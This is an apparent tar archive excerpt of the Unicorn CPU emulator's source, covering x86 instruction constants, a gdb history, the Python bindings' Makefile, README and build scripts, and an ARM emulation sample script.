UC_X86_INS_VMMCALL = 929; UC_X86_INS_VMOVQ = 930; UC_X86_INS_VMOVDDUP = 931; UC_X86_INS_VMOVD = 932; UC_X86_INS_VMOVDQA32 = 933; UC_X86_INS_VMOVDQA64 = 934; UC_X86_INS_VMOVDQA = 935; UC_X86_INS_VMOVDQU16 = 936; UC_X86_INS_VMOVDQU32 = 937; UC_X86_INS_VMOVDQU64 = 938; UC_X86_INS_VMOVDQU8 = 939; UC_X86_INS_VMOVDQU = 940; UC_X86_INS_VMOVHLPS = 941; UC_X86_INS_VMOVHPD = 942; UC_X86_INS_VMOVHPS = 943; UC_X86_INS_VMOVLHPS = 944; UC_X86_INS_VMOVLPD = 945; UC_X86_INS_VMOVLPS = 946; UC_X86_INS_VMOVMSKPD = 947; UC_X86_INS_VMOVMSKPS = 948; UC_X86_INS_VMOVNTDQA = 949; UC_X86_INS_VMOVNTDQ = 950; UC_X86_INS_VMOVNTPD = 951; UC_X86_INS_VMOVNTPS = 952; UC_X86_INS_VMOVSD = 953; UC_X86_INS_VMOVSHDUP = 954; UC_X86_INS_VMOVSLDUP = 955; UC_X86_INS_VMOVSS = 956; UC_X86_INS_VMOVUPD = 957; UC_X86_INS_VMOVUPS = 958; UC_X86_INS_VMPSADBW = 959; UC_X86_INS_VMPTRLD = 960; UC_X86_INS_VMPTRST = 961; UC_X86_INS_VMREAD = 962; UC_X86_INS_VMRESUME = 963; UC_X86_INS_VMRUN = 964; UC_X86_INS_VMSAVE = 965; UC_X86_INS_VMULPD = 966; UC_X86_INS_VMULPS = 967; UC_X86_INS_VMULSD = 968; UC_X86_INS_VMULSS = 969; UC_X86_INS_VMWRITE = 970; UC_X86_INS_VMXOFF = 971; UC_X86_INS_VMXON = 972; UC_X86_INS_VPABSB = 973; UC_X86_INS_VPABSD = 974; UC_X86_INS_VPABSQ = 975; UC_X86_INS_VPABSW = 976; UC_X86_INS_VPACKSSDW = 977; UC_X86_INS_VPACKSSWB = 978; UC_X86_INS_VPACKUSDW = 979; UC_X86_INS_VPACKUSWB = 980; UC_X86_INS_VPADDB = 981; UC_X86_INS_VPADDD = 982; UC_X86_INS_VPADDQ = 983; UC_X86_INS_VPADDSB = 984; UC_X86_INS_VPADDSW = 985; UC_X86_INS_VPADDUSB = 986; UC_X86_INS_VPADDUSW = 987; UC_X86_INS_VPADDW = 988; UC_X86_INS_VPALIGNR = 989; UC_X86_INS_VPANDD = 990; UC_X86_INS_VPANDND = 991; UC_X86_INS_VPANDNQ = 992; UC_X86_INS_VPANDN = 993; UC_X86_INS_VPANDQ = 994; UC_X86_INS_VPAND = 995; UC_X86_INS_VPAVGB = 996; UC_X86_INS_VPAVGW = 997; UC_X86_INS_VPBLENDD = 998; UC_X86_INS_VPBLENDMB = 999; UC_X86_INS_VPBLENDMD = 1000; UC_X86_INS_VPBLENDMQ = 1001; UC_X86_INS_VPBLENDMW = 1002; UC_X86_INS_VPBLENDVB = 1003; UC_X86_INS_VPBLENDW = 1004; UC_X86_INS_VPBROADCASTB = 1005; UC_X86_INS_VPBROADCASTD = 1006; UC_X86_INS_VPBROADCASTMB2Q = 1007; UC_X86_INS_VPBROADCASTMW2D = 1008; UC_X86_INS_VPBROADCASTQ = 1009; UC_X86_INS_VPBROADCASTW = 1010; UC_X86_INS_VPCLMULQDQ = 1011; UC_X86_INS_VPCMOV = 1012; UC_X86_INS_VPCMPB = 1013; UC_X86_INS_VPCMPD = 1014; UC_X86_INS_VPCMPEQB = 1015; UC_X86_INS_VPCMPEQD = 1016; UC_X86_INS_VPCMPEQQ = 1017; UC_X86_INS_VPCMPEQW = 1018; UC_X86_INS_VPCMPESTRI = 1019; UC_X86_INS_VPCMPESTRM = 1020; UC_X86_INS_VPCMPGTB = 1021; UC_X86_INS_VPCMPGTD = 1022; UC_X86_INS_VPCMPGTQ = 1023; UC_X86_INS_VPCMPGTW = 1024; UC_X86_INS_VPCMPISTRI = 1025; UC_X86_INS_VPCMPISTRM = 1026; UC_X86_INS_VPCMPQ = 1027; UC_X86_INS_VPCMPUB = 1028; UC_X86_INS_VPCMPUD = 1029; UC_X86_INS_VPCMPUQ = 1030; UC_X86_INS_VPCMPUW = 1031; UC_X86_INS_VPCMPW = 1032; UC_X86_INS_VPCOMB = 1033; UC_X86_INS_VPCOMD = 1034; UC_X86_INS_VPCOMPRESSD = 1035; UC_X86_INS_VPCOMPRESSQ = 1036; UC_X86_INS_VPCOMQ = 1037; UC_X86_INS_VPCOMUB = 1038; UC_X86_INS_VPCOMUD = 1039; UC_X86_INS_VPCOMUQ = 1040; UC_X86_INS_VPCOMUW = 1041; UC_X86_INS_VPCOMW = 1042; UC_X86_INS_VPCONFLICTD = 1043; UC_X86_INS_VPCONFLICTQ = 1044; UC_X86_INS_VPERM2F128 = 1045; UC_X86_INS_VPERM2I128 = 1046; UC_X86_INS_VPERMD = 1047; UC_X86_INS_VPERMI2D = 1048; UC_X86_INS_VPERMI2PD = 1049; UC_X86_INS_VPERMI2PS = 1050; UC_X86_INS_VPERMI2Q = 1051; UC_X86_INS_VPERMIL2PD = 1052; UC_X86_INS_VPERMIL2PS = 1053; UC_X86_INS_VPERMILPD = 1054; UC_X86_INS_VPERMILPS = 1055; UC_X86_INS_VPERMPD = 1056; UC_X86_INS_VPERMPS = 1057; UC_X86_INS_VPERMQ = 1058; UC_X86_INS_VPERMT2D = 1059; UC_X86_INS_VPERMT2PD = 1060; UC_X86_INS_VPERMT2PS = 1061; UC_X86_INS_VPERMT2Q = 1062; UC_X86_INS_VPEXPANDD = 1063; UC_X86_INS_VPEXPANDQ = 1064; UC_X86_INS_VPEXTRB = 1065; UC_X86_INS_VPEXTRD = 1066; UC_X86_INS_VPEXTRQ = 1067; UC_X86_INS_VPEXTRW = 1068; UC_X86_INS_VPGATHERDD = 1069; UC_X86_INS_VPGATHERDQ = 1070; UC_X86_INS_VPGATHERQD = 1071; UC_X86_INS_VPGATHERQQ = 1072; UC_X86_INS_VPHADDBD = 1073; UC_X86_INS_VPHADDBQ = 1074; UC_X86_INS_VPHADDBW = 1075; UC_X86_INS_VPHADDDQ = 1076; UC_X86_INS_VPHADDD = 1077; UC_X86_INS_VPHADDSW = 1078; UC_X86_INS_VPHADDUBD = 1079; UC_X86_INS_VPHADDUBQ = 1080; UC_X86_INS_VPHADDUBW = 1081; UC_X86_INS_VPHADDUDQ = 1082; UC_X86_INS_VPHADDUWD = 1083; UC_X86_INS_VPHADDUWQ = 1084; UC_X86_INS_VPHADDWD = 1085; UC_X86_INS_VPHADDWQ = 1086; UC_X86_INS_VPHADDW = 1087; UC_X86_INS_VPHMINPOSUW = 1088; UC_X86_INS_VPHSUBBW = 1089; UC_X86_INS_VPHSUBDQ = 1090; UC_X86_INS_VPHSUBD = 1091; UC_X86_INS_VPHSUBSW = 1092; UC_X86_INS_VPHSUBWD = 1093; UC_X86_INS_VPHSUBW = 1094; UC_X86_INS_VPINSRB = 1095; UC_X86_INS_VPINSRD = 1096; UC_X86_INS_VPINSRQ = 1097; UC_X86_INS_VPINSRW = 1098; UC_X86_INS_VPLZCNTD = 1099; UC_X86_INS_VPLZCNTQ = 1100; UC_X86_INS_VPMACSDD = 1101; UC_X86_INS_VPMACSDQH = 1102; UC_X86_INS_VPMACSDQL = 1103; UC_X86_INS_VPMACSSDD = 1104; UC_X86_INS_VPMACSSDQH = 1105; UC_X86_INS_VPMACSSDQL = 1106; UC_X86_INS_VPMACSSWD = 1107; UC_X86_INS_VPMACSSWW = 1108; UC_X86_INS_VPMACSWD = 1109; UC_X86_INS_VPMACSWW = 1110; UC_X86_INS_VPMADCSSWD = 1111; UC_X86_INS_VPMADCSWD = 1112; UC_X86_INS_VPMADDUBSW = 1113; UC_X86_INS_VPMADDWD = 1114; UC_X86_INS_VPMASKMOVD = 1115; UC_X86_INS_VPMASKMOVQ = 1116; UC_X86_INS_VPMAXSB = 1117; UC_X86_INS_VPMAXSD = 1118; UC_X86_INS_VPMAXSQ = 1119; UC_X86_INS_VPMAXSW = 1120; UC_X86_INS_VPMAXUB = 1121; UC_X86_INS_VPMAXUD = 1122; UC_X86_INS_VPMAXUQ = 1123; UC_X86_INS_VPMAXUW = 1124; UC_X86_INS_VPMINSB = 1125; UC_X86_INS_VPMINSD = 1126; UC_X86_INS_VPMINSQ = 1127; UC_X86_INS_VPMINSW = 1128; UC_X86_INS_VPMINUB = 1129; UC_X86_INS_VPMINUD = 1130; UC_X86_INS_VPMINUQ = 1131; UC_X86_INS_VPMINUW = 1132; UC_X86_INS_VPMOVDB = 1133; UC_X86_INS_VPMOVDW = 1134; UC_X86_INS_VPMOVM2B = 1135; UC_X86_INS_VPMOVM2D = 1136; UC_X86_INS_VPMOVM2Q = 1137; UC_X86_INS_VPMOVM2W = 1138; UC_X86_INS_VPMOVMSKB = 1139; UC_X86_INS_VPMOVQB = 1140; UC_X86_INS_VPMOVQD = 1141; UC_X86_INS_VPMOVQW = 1142; UC_X86_INS_VPMOVSDB = 1143; UC_X86_INS_VPMOVSDW = 1144; UC_X86_INS_VPMOVSQB = 1145; UC_X86_INS_VPMOVSQD = 1146; UC_X86_INS_VPMOVSQW = 1147; UC_X86_INS_VPMOVSXBD = 1148; UC_X86_INS_VPMOVSXBQ = 1149; UC_X86_INS_VPMOVSXBW = 1150; UC_X86_INS_VPMOVSXDQ = 1151; UC_X86_INS_VPMOVSXWD = 1152; UC_X86_INS_VPMOVSXWQ = 1153; UC_X86_INS_VPMOVUSDB = 1154; UC_X86_INS_VPMOVUSDW = 1155; UC_X86_INS_VPMOVUSQB = 1156; UC_X86_INS_VPMOVUSQD = 1157; UC_X86_INS_VPMOVUSQW = 1158; UC_X86_INS_VPMOVZXBD = 1159; UC_X86_INS_VPMOVZXBQ = 1160; UC_X86_INS_VPMOVZXBW = 1161; UC_X86_INS_VPMOVZXDQ = 1162; UC_X86_INS_VPMOVZXWD = 1163; UC_X86_INS_VPMOVZXWQ = 1164; UC_X86_INS_VPMULDQ = 1165; UC_X86_INS_VPMULHRSW = 1166; UC_X86_INS_VPMULHUW = 1167; UC_X86_INS_VPMULHW = 1168; UC_X86_INS_VPMULLD = 1169; UC_X86_INS_VPMULLQ = 1170; UC_X86_INS_VPMULLW = 1171; UC_X86_INS_VPMULUDQ = 1172; UC_X86_INS_VPORD = 1173; UC_X86_INS_VPORQ = 1174; UC_X86_INS_VPOR = 1175; UC_X86_INS_VPPERM = 1176; UC_X86_INS_VPROTB = 1177; UC_X86_INS_VPROTD = 1178; UC_X86_INS_VPROTQ = 1179; UC_X86_INS_VPROTW = 1180; UC_X86_INS_VPSADBW = 1181; UC_X86_INS_VPSCATTERDD = 1182; UC_X86_INS_VPSCATTERDQ = 1183; UC_X86_INS_VPSCATTERQD = 1184; UC_X86_INS_VPSCATTERQQ = 1185; UC_X86_INS_VPSHAB = 1186; UC_X86_INS_VPSHAD = 1187; UC_X86_INS_VPSHAQ = 1188; UC_X86_INS_VPSHAW = 1189; UC_X86_INS_VPSHLB = 1190; UC_X86_INS_VPSHLD = 1191; UC_X86_INS_VPSHLQ = 1192; UC_X86_INS_VPSHLW = 1193; UC_X86_INS_VPSHUFB = 1194; UC_X86_INS_VPSHUFD = 1195; UC_X86_INS_VPSHUFHW = 1196; UC_X86_INS_VPSHUFLW = 1197; UC_X86_INS_VPSIGNB = 1198; UC_X86_INS_VPSIGND = 1199; UC_X86_INS_VPSIGNW = 1200; UC_X86_INS_VPSLLDQ = 1201; UC_X86_INS_VPSLLD = 1202; UC_X86_INS_VPSLLQ = 1203; UC_X86_INS_VPSLLVD = 1204; UC_X86_INS_VPSLLVQ = 1205; UC_X86_INS_VPSLLW = 1206; UC_X86_INS_VPSRAD = 1207; UC_X86_INS_VPSRAQ = 1208; UC_X86_INS_VPSRAVD = 1209; UC_X86_INS_VPSRAVQ = 1210; UC_X86_INS_VPSRAW = 1211; UC_X86_INS_VPSRLDQ = 1212; UC_X86_INS_VPSRLD = 1213; UC_X86_INS_VPSRLQ = 1214; UC_X86_INS_VPSRLVD = 1215; UC_X86_INS_VPSRLVQ = 1216; UC_X86_INS_VPSRLW = 1217; UC_X86_INS_VPSUBB = 1218; UC_X86_INS_VPSUBD = 1219; UC_X86_INS_VPSUBQ = 1220; UC_X86_INS_VPSUBSB = 1221; UC_X86_INS_VPSUBSW = 1222; UC_X86_INS_VPSUBUSB = 1223; UC_X86_INS_VPSUBUSW = 1224; UC_X86_INS_VPSUBW = 1225; UC_X86_INS_VPTESTMD = 1226; UC_X86_INS_VPTESTMQ = 1227; UC_X86_INS_VPTESTNMD = 1228; UC_X86_INS_VPTESTNMQ = 1229; UC_X86_INS_VPTEST = 1230; UC_X86_INS_VPUNPCKHBW = 1231; UC_X86_INS_VPUNPCKHDQ = 1232; UC_X86_INS_VPUNPCKHQDQ = 1233; UC_X86_INS_VPUNPCKHWD = 1234; UC_X86_INS_VPUNPCKLBW = 1235; UC_X86_INS_VPUNPCKLDQ = 1236; UC_X86_INS_VPUNPCKLQDQ = 1237; UC_X86_INS_VPUNPCKLWD = 1238; UC_X86_INS_VPXORD = 1239; UC_X86_INS_VPXORQ = 1240; UC_X86_INS_VPXOR = 1241; UC_X86_INS_VRCP14PD = 1242; UC_X86_INS_VRCP14PS = 1243; UC_X86_INS_VRCP14SD = 1244; UC_X86_INS_VRCP14SS = 1245; UC_X86_INS_VRCP28PD = 1246; UC_X86_INS_VRCP28PS = 1247; UC_X86_INS_VRCP28SD = 1248; UC_X86_INS_VRCP28SS = 1249; UC_X86_INS_VRCPPS = 1250; UC_X86_INS_VRCPSS = 1251; UC_X86_INS_VRNDSCALEPD = 1252; UC_X86_INS_VRNDSCALEPS = 1253; UC_X86_INS_VRNDSCALESD = 1254; UC_X86_INS_VRNDSCALESS = 1255; UC_X86_INS_VROUNDPD = 1256; UC_X86_INS_VROUNDPS = 1257; UC_X86_INS_VROUNDSD = 1258; UC_X86_INS_VROUNDSS = 1259; UC_X86_INS_VRSQRT14PD = 1260; UC_X86_INS_VRSQRT14PS = 1261; UC_X86_INS_VRSQRT14SD = 1262; UC_X86_INS_VRSQRT14SS = 1263; UC_X86_INS_VRSQRT28PD = 1264; UC_X86_INS_VRSQRT28PS = 1265; UC_X86_INS_VRSQRT28SD = 1266; UC_X86_INS_VRSQRT28SS = 1267; UC_X86_INS_VRSQRTPS = 1268; UC_X86_INS_VRSQRTSS = 1269; UC_X86_INS_VSCATTERDPD = 1270; UC_X86_INS_VSCATTERDPS = 1271; UC_X86_INS_VSCATTERPF0DPD = 1272; UC_X86_INS_VSCATTERPF0DPS = 1273; UC_X86_INS_VSCATTERPF0QPD = 1274; UC_X86_INS_VSCATTERPF0QPS = 1275; UC_X86_INS_VSCATTERPF1DPD = 1276; UC_X86_INS_VSCATTERPF1DPS = 1277; UC_X86_INS_VSCATTERPF1QPD = 1278; UC_X86_INS_VSCATTERPF1QPS = 1279; UC_X86_INS_VSCATTERQPD = 1280; UC_X86_INS_VSCATTERQPS = 1281; UC_X86_INS_VSHUFPD = 1282; UC_X86_INS_VSHUFPS = 1283; UC_X86_INS_VSQRTPD = 1284; UC_X86_INS_VSQRTPS = 1285; UC_X86_INS_VSQRTSD = 1286; UC_X86_INS_VSQRTSS = 1287; UC_X86_INS_VSTMXCSR = 1288; UC_X86_INS_VSUBPD = 1289; UC_X86_INS_VSUBPS = 1290; UC_X86_INS_VSUBSD = 1291; UC_X86_INS_VSUBSS = 1292; UC_X86_INS_VTESTPD = 1293; UC_X86_INS_VTESTPS = 1294; UC_X86_INS_VUNPCKHPD = 1295; UC_X86_INS_VUNPCKHPS = 1296; UC_X86_INS_VUNPCKLPD = 1297; UC_X86_INS_VUNPCKLPS = 1298; UC_X86_INS_VZEROALL = 1299; UC_X86_INS_VZEROUPPER = 1300; UC_X86_INS_WAIT = 1301; UC_X86_INS_WBINVD = 1302; UC_X86_INS_WRFSBASE = 1303; UC_X86_INS_WRGSBASE = 1304; UC_X86_INS_WRMSR = 1305; UC_X86_INS_XABORT = 1306; UC_X86_INS_XACQUIRE = 1307; UC_X86_INS_XBEGIN = 1308; UC_X86_INS_XCHG = 1309; UC_X86_INS_XCRYPTCBC = 1310; UC_X86_INS_XCRYPTCFB = 1311; UC_X86_INS_XCRYPTCTR = 1312; UC_X86_INS_XCRYPTECB = 1313; UC_X86_INS_XCRYPTOFB = 1314; UC_X86_INS_XEND = 1315; UC_X86_INS_XGETBV = 1316; UC_X86_INS_XLATB = 1317; UC_X86_INS_XRELEASE = 1318; UC_X86_INS_XRSTOR = 1319; UC_X86_INS_XRSTOR64 = 1320; UC_X86_INS_XRSTORS = 1321; UC_X86_INS_XRSTORS64 = 1322; UC_X86_INS_XSAVE = 1323; UC_X86_INS_XSAVE64 = 1324; UC_X86_INS_XSAVEC = 1325; UC_X86_INS_XSAVEC64 = 1326; UC_X86_INS_XSAVEOPT = 1327; UC_X86_INS_XSAVEOPT64 = 1328; UC_X86_INS_XSAVES = 1329; UC_X86_INS_XSAVES64 = 1330; UC_X86_INS_XSETBV = 1331; UC_X86_INS_XSHA1 = 1332; UC_X86_INS_XSHA256 = 1333; UC_X86_INS_XSTORE = 1334; UC_X86_INS_XTEST = 1335; UC_X86_INS_FDISI8087_NOP = 1336; UC_X86_INS_FENI8087_NOP = 1337; UC_X86_INS_ENDING = 1338; implementation end.���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016322�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/.gdb_history����������������������������������������������������������0000664�0000000�0000000�00000001040�14675241067�0020633�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������q rr r bt b tcg.c:3075 r p ts p *ts bt q b translate.c:4810 r q r b translate.c:4810 frame level 5 frame level 7 q r bt q r bt q r bt b translate.c:4810 r p/x s->pc n n n n n n n n p/x aflag n n n p/x dflag n n n n p/x f n s n n n n n n n n n n n n n n n q r bt q r bt frame level 7 p/x op p op p *op q b tcg_optimize r b tcg_optimize_x86_64 r n s s s q r exit b tcg_dump_ops r b tcg_dump_ops b tcg_dump_ops_x86_64 r b tcg_optimize_x86_64 r b tcg_optimize_x86_64 r b tcg_optimize_x86_64 r b print_log r b print_log r f fprintf q b write r bt q ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/MANIFEST.in�����������������������������������������������������������0000664�0000000�0000000�00000000134�14675241067�0020056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������recursive-include src * recursive-include prebuilt * include LICENSE.TXT include README.TXT ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/Makefile��������������������������������������������������������������0000664�0000000�0000000�00000004326�14675241067�0017767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com> .PHONY: gen_const install install3 clean sdist sdist3 bdist bdist3 sdist_win bdist_win gen_const: cd .. && python3 const_generator.py python install: rm -rf src/ dist/ rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll if test -n "${DESTDIR}"; then \ python3 setup.py install --root="${DESTDIR}"; \ else \ python3 setup.py install; \ fi install3: rm -rf src/ dist/ rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll if test -n "${DESTDIR}"; then \ python3 setup.py install --root="${DESTDIR}"; \ else \ python3 setup.py install; \ fi # build & upload PyPi package with source code of the core sdist: rm -rf src/ dist/ rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll python3 setup.py sdist register upload # build & upload PyPi package with source code of the core sdist3: rm -rf src/ dist/ rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll python3 setup.py sdist register upload # build & upload PyPi package with precompiled core bdist: rm -rf src/ dist/ rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll python3 setup.py bdist_wheel register upload # build & upload PyPi package with precompiled core bdist3: rm -rf src/ dist/ rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll python3 setup.py bdist_wheel register upload # build & upload PyPi package with prebuilt core # NOTE: be sure to have precompiled core under prebuilt/win*/ beforehand sdist_win: rm -rf src/ dist/ python3 setup.py sdist register upload # build & upload PyPi package with prebuilt core # NOTE: be sure to have precompiled core under prebuilt/win*/ beforehand sdist3_win: rm -rf src/ dist/ python3 setup.py sdist register upload clean: rm -rf src/ dist/ build/ MANIFEST rm -rf prebuilt/win64/unicorn.dll rm -rf prebuilt/win32/unicorn.dll rm -rf unicorn/lib unicorn/include rm -rf unicorn/*.pyc rm -rf unicorn.egg-info SAMPLES = sample_arm.py sample_arm64.py sample_mips.py SAMPLES += sample_sparc.py sample_m68k.py sample_x86.py check: @for t in $(SAMPLES); do \ echo Check $$t ... ; \ ./$$t > /dev/null && echo OK || echo FAILED; \ done ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/README.md�������������������������������������������������������������0000664�0000000�0000000�00000003655�14675241067�0017612�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Python Bindings for Unicorn Originally written by Nguyen Anh Quynh, polished and redesigned by elicn, maintained by all community contributors. ## Install Install a prebuilt wheel from PyPI: ```bash pip3 install unicorn ``` In case you would like to develop the bindings: ```bash # Python3 DEBUG=1 THREADS=4 pip3 install --user -e . # Workaround for Pylance DEBUG=1 THREADS=4 pip3 install --user -e . --config-settings editable_mode=strict # Python2 DEBUG=1 THREADS=4 pip install -e . ``` or install it by building it by yourself: ```bash # Python3 THREADS=4 pip3 install --user . # Python2, unfortunately `pip2` doesn't support in-tree build THREADS=4 python3 setup.py install ``` Explanations for arguments: - `THREADS=4` will use 4 threads for building. - `DEBUG=1` will build debug version of unicorn. - `--user` will install the bindings to your user directory instead of requiring root permission. - `-e` infers the editable mode, which gives your instant feedback instead of re-compiling every time. Note that you should setup a valid building environment according to docs/COMPILE.md but not necessarily build it because `setup.py` will do this for you. ## Python2 compatibility By default, Unicorn python bindings will be maintained against Python3 as it offers more powerful features which improves developing efficiency. Meanwhile, Unicorn will only keep compatible with all features Unicorn1 offers regarding Python2 because Python2 has reached end-of-life for more than 3 years as the time of writing this README. While offering all features for both Python2 & Python3 is desirable and doable, it inevitably costs too much efforts to maintain and few users really rely on this. Therefore, we assume that if users still stick to Python2, previous Unicorn1 features we offer should be enough. If you really want some new features Unicorn2 offers, please check and pull request to `unicorn/unicorn_py2``. We are happy to review and accept!�����������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/build_wheel.sh��������������������������������������������������������0000775�0000000�0000000�00000000441�14675241067�0021143�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/bash set -e -x cd bindings/python # Compile wheels python3.7 setup.py bdist_wheel $@ cd dist # We can't repair an aarch64 wheel on x64 hosts # https://github.com/pypa/auditwheel/issues/244 if [[ ! "$*" =~ "aarch64" ]];then auditwheel repair *.whl mv -f wheelhouse/*.whl . fi �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/musl_wheel.sh���������������������������������������������������������0000664�0000000�0000000�00000000436�14675241067�0021025�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh # TODO: use cibuildwheel apk update apk add gcc make cmake pkgconfig linux-headers git musl-dev patchelf python3 -m pip install -U pip setuptools auditwheel cd bindings/python && python3 setup.py bdist_wheel && auditwheel repair dist/*.whl && mv -f wheelhouse/*.whl ./dist/����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/prebuilt/�������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020150�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/prebuilt/.gitkeep�����������������������������������������������������0000664�0000000�0000000�00000000000�14675241067�0021567�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_all.sh���������������������������������������������������������0000775�0000000�0000000�00000001557�14675241067�0021002�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh python3 ./sample_arm.py echo "==========================" python3 ./sample_armeb.py echo "==========================" python3 ./sample_arm64.py echo "==========================" python3 ./sample_arm64eb.py echo "==========================" python3 ./sample_m68k.py echo "==========================" python3 ./sample_mips.py echo "==========================" python3 ./sample_ppc.py echo "==========================" python3 ./sample_riscv.py echo "==========================" python3 ./sample_s390x.py echo "==========================" python3 ./sample_sparc.py echo "==========================" python3 ./sample_tricore.py echo "==========================" python3 ./sample_x86.py echo "==========================" python3 ./shellcode.py echo "==========================" python3 ./sample_ctl.py echo "==========================" python3 ./sample_network_auditing.py �������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_arm.py���������������������������������������������������������0000775�0000000�0000000�00000007134�14675241067�0021024�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> from __future__ import print_function from unicorn import * from unicorn.arm_const import * # code to be emulated ARM_CODE = b"\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 THUMB_CODE = b"\x83\xb0" # sub sp, #0xc # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test ARM def test_arm(): print("Emulate ARM code") try: # Initialize emulator in ARM mode mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_R0, 0x1234) mu.reg_write(UC_ARM_REG_R2, 0x6789) mu.reg_write(UC_ARM_REG_R3, 0x3333) mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF) #All application flags turned on # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing one instruction at ADDRESS with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r0 = mu.reg_read(UC_ARM_REG_R0) r1 = mu.reg_read(UC_ARM_REG_R1) print(">>> R0 = 0x%x" %r0) print(">>> R1 = 0x%x" %r1) except UcError as e: print("ERROR: %s" % e) def test_thumb(): print("Emulate THUMB code") try: # Initialize emulator in thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, THUMB_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_SP, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time # Note we start at ADDRESS | 1 to indicate THUMB mode. mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") sp = mu.reg_read(UC_ARM_REG_SP) print(">>> SP = 0x%x" %sp) except UcError as e: print("ERROR: %s" % e) def test_read_sctlr(): print("Read SCTLR") try: # Initialize emulator in thumb mode mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) # Read SCTLR # cp = 15 # is64 = 0 # sec = 0 # crn = 1 # crm = 0 # opc1 = 0 # opc2 = 0 val = mu.reg_read(UC_ARM_REG_CP_REG, (15, 0, 0, 1, 0, 0, 0)) print(">>> SCTLR = 0x%x" % val) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_arm() print("=" * 26) test_thumb() print("=" * 26) test_read_sctlr() 